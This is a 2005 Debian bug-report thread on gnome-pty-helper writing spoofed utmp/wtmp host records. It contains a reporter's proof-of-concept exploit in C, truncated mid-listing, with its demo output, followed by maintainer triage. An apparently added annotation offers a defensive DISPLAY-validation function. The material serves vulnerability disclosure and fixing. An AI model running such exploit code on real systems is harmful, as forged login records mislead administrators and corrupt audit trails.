Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-30 Thread Loïc Minier
tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks

[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]

Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
 gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
 DISPLAY (host) settings. I am not sure if it can be tricked into erasing
 existing records.

 This vulnerability is identified as CAN-2005-0023.  The upstream
 developers of vte have been notified of the bug at:
http://bugzilla.gnome.org/show_bug.cgi?id=317312

 Bye,
-- 
Loïc Minier [EMAIL PROTECTED]



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Loïc Minier
Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
 gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
 DISPLAY (host) settings. I am not sure if it can be tricked into erasing
 existing records.

 Thanks for your report.

 Do you have a CVE ID for this security issue?

 Did you check whether libvte4 is affected?

 Do you have a fix?

   Thanks,

-- 
Loïc Minier [EMAIL PROTECTED]



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo
Dear Loic,

  Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am I sure if this is serious
enough to deserve one.)

  Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

  Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
own that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Loïc Minier
On Mon, Sep 26, 2005, Paul Szabo wrote:
 No. Sorry, I do not know how to get one. (Nor am sure if this is serious
 enough to deserve one.)

 Then I'll see whether it deserves one, and attempt to request one.

   Did you check whether libvte4 is affected?
 No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 equivalent of libzvt2, you can grab it from:
http://packages.debian.org/
 the source package for this library is vte.

 It'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too.  Let me know if you don't have a setup
 permitting the check, or if you lack the time.

   Bye,

-- 
Loïc Minier [EMAIL PROTECTED]



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo
Dear Loic,

   Did you check whether libvte4 is affected?
 No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 equivalent of libzvt2 ...
 It'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too.  Let me know if you don't have a setup
 permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs
display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


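Paul's point above is that the helper copies the DISPLAY value into the utmp host field without any sanity check. As an added example (my own code, not the zvt or vte project's fix and not from this thread), the C function below shows the kind of syntactic check a privileged helper could apply before recording a display name; the accepted grammar host:N[.M], the host character set and the function name are my assumptions. It rejects control characters, whitespace and overlong strings, but it does not prove the caller owns the display.

```c
/* display_check.c - added example, not the zvt/vte helper's own code.
 * Validate a DISPLAY value before it is copied into a utmp ut_host field. */
#include <ctype.h>
#include <string.h>
#include <utmp.h>   /* UT_HOSTSIZE: width of the fixed ut_host field */

/* Advance *pos over one or more decimal digits; return 1 if any were seen. */
static int digits_run(const char *s, size_t *pos)
{
        size_t start = *pos;
        while (isdigit((unsigned char)s[*pos]))
                (*pos)++;
        return *pos > start;
}

/* Accept "host:N" or "host:N.M" where host is empty or [A-Za-z0-9.-] and
 * N, M are decimal (assumed grammar). On success copy the value into `out`
 * and return 1; otherwise leave `out` empty and return 0. */
int display_for_utmp(const char *display, char out[UT_HOSTSIZE])
{
        size_t len, i;
        const char *colon;

        out[0] = '\0';
        if (display == NULL)
                return 0;
        len = strlen(display);
        /* Keep room for the NUL so readers of ut_host never run off the field. */
        if (len == 0 || len >= UT_HOSTSIZE)
                return 0;
        /* Printable ASCII only: no newlines, tabs, spaces or escape sequences
         * that could corrupt `who` output or the record itself. */
        for (i = 0; i < len; i++) {
                unsigned char c = (unsigned char)display[i];
                if (c < 0x21 || c > 0x7e)
                        return 0;
        }
        colon = strchr(display, ':');
        if (colon == NULL || colon[1] == '\0')
                return 0;
        /* Host part: letters, digits, '.' and '-' only (IPv6 forms rejected). */
        for (i = 0; display + i < colon; i++) {
                unsigned char c = (unsigned char)display[i];
                if (!isalnum(c) && c != '.' && c != '-')
                        return 0;
        }
        /* Display number, optionally followed by ".screen"; nothing after it. */
        i = (size_t)(colon - display) + 1;
        if (!digits_run(display, &i))
                return 0;
        if (display[i] == '.' && (++i, !digits_run(display, &i)))
                return 0;
        if (display[i] != '\0')
                return 0;
        memcpy(out, display, len + 1);
        return 1;
}
```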



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole


gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


OUTPUT:

[EMAIL PROTECTED]:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz  pts/2Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz  pts/2Sep 20 08:40 (xyz)
psz  pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER   PID %CPU %MEM   VSZ  RSS TTY  STAT START   TIME COMMAND
psz  31358  0.0  0.3 10340 7768 ?S08:14   0:00 xterm -T [EMAIL 
PROTECTED] -n [EMAIL PROTECTED] -sb -sl 1 -ls
psz  31444  0.0  0.0  1484  380 pts/1S08:21   0:00 
gnome-pty-helper-exploit xyz
psz  31446  0.0  0.0  1696  604 pts/1S08:21   0:00 gnome-pty-helper
psz  31454  0.0  0.0  2496  848 pts/1R+   08:21   0:00 ps aux
[1]+  Done   gnome-pty-helper-exploit xyz
psz  pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)


CODE:

/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code stolen from subshell.c .
*/

#include <sys/types.h>

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG  4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol  [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include <sys/socket.h>
#include <sys/uio.h>

static struct cmsghdr *cmptr;
#define CONTROLLEN  sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
        struct iovec iov [1];
        struct msghdr msg;
        char buf [32];

        iov [0].iov_base = buf;
        iov [0].iov_len  = sizeof (buf);
        msg.msg_iov      = iov;
        msg.msg_iovlen   = 1;
        msg.msg_name     = NULL;
        msg.msg_namelen  = 0;

        if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
                return -1;
        msg.msg_control = (caddr_t) cmptr;
        msg.msg_controllen = CONTROLLEN;

        if (recvmsg (helper_fd, &msg, 0) <= 0)
                return -1;

        return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
        return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
        GnomePtyOps op;
        int result, n;
        void *tag;

        if (helper_pid == -1)
                return NULL;

        if (helper_pid == 0){
                if (s_pipe (helper_socket_protocol) == -1)
                        return NULL;

                if (s_pipe (helper_socket_fdpassing) == -1){
                        close (helper_socket_protocol [0]);
                        close (helper_socket_protocol [1]);
                        return NULL;
                }

                helper_pid = fork ();

                if (helper_pid == -1){
                        close (helper_socket_protocol [0]);
                        close (helper_socket_protocol [1]);
                        close (helper_socket_fdpassing [0]);
                        close (helper_socket_fdpassing [1]);
                        return NULL;
                }

                if (helper_pid == 0){
                        close (0);
                        close (1);
                        dup2 (helper_socket_protocol  [1], 0);
                        dup2 (helper_socket_fdpassing [1], 1);

                        /* Close aliases */
                        close (helper_socket_protocol  [0]);
                        close (helper_socket_protocol  [1]);
                        close (helper_socket_fdpassing [0]);
                        close (helper_socket_fdpassing [1]);

                        execl ("/usr/sbin/gnome-pty-helper",
                               "gnome-pty-helper", NULL);
                        exit (1);
                } else {
                        close (helper_socket_fdpassing [1]);
                        close (helper_socket_protocol  [1]);

                        /*
                         * Set the close-on-exec flag for the other
                         * descriptors, these should never propagate
                         * (otherwise gnome-pty-helper won't notice when
                         * this process is killed).
                         */
fcntl 

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Steve Langasek
On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
 Package: libzvt2
 Version: 1.4.2-19
 Severity: critical
 File: /usr/sbin/gnome-pty-helper
 Justification: root security hole

 gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
 DISPLAY (host) settings. I am not sure if it can be tricked into erasing
 existing records.

Why is this filed at severity: critical?  What is the attack vector here
which permits root privilege escalation?

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/




Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo
Steve,

 gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
 DISPLAY (host) settings. I am not sure if it can be tricked into erasing
 existing records.

 Why is this filed at severity: critical?  What is the attack vector here
 which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact I cannot think of any attacks: I cannot think of any important uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-pty-helper.)

Cheers, Paul

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Steve Langasek
On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:

  gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
  DISPLAY (host) settings. I am not sure if it can be tricked into erasing
  existing records.

  Why is this filed at severity: critical?  What is the attack vector here
  which permits root privilege escalation?

 I do not know any root escalation methods. When using reportbug, those
 options seemed to fit best, apologies if they were not; please change if
 appropriate. (For future reference: which options should I have used
 instead?)

Hmm... After rereading the definition at
http://www.debian.org/Bugs/Developer#severities, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.

Cheers,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/

